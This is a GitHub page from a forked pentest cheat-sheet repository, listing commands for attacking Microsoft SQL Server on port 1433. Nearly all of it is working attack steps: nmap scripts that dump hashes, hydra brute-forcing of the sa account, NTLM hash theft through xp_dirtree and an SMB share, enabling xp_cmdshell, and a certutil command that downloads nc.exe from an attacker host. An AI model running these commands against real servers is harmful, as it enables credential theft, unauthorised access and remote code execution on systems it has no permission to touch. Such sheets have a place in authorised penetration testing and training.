forked from Gimpy42/CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 2
/
1433
42 lines (29 loc) · 1.19 KB
/
1433
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# MSSQL - 1433
# Get information
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
# Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u
hydra -l sa -P password.txt -V $ip mssql
# Having credentials
mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>
# Connect to MSSQL server
sqsh -S server_address -U sa -P password
# Once logged in you can run queries:
SQL> select @@ version;
# Steal NTLM hash
sudo smbserver.py -smb2support liodeus .
# Steal the NTLM hash, crack it with john or hashcat
SQL> exec master..xp_dirtree '\\<IP>\<HOME>\'
# Try to enable code execution
SQL> enable_xp_cmdshell
# OR
SQL> exec sp_configure 'show advanced options', 1
SQL> reconfigure
SQL> exec sp_configure 'xp_cmdshell', 1
SQL> reconfigure
# Execute code
SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http://<IP>/nc.exe
# Manual exploit
https://www.asafety.fr/mssql-injection-cheat-sheet/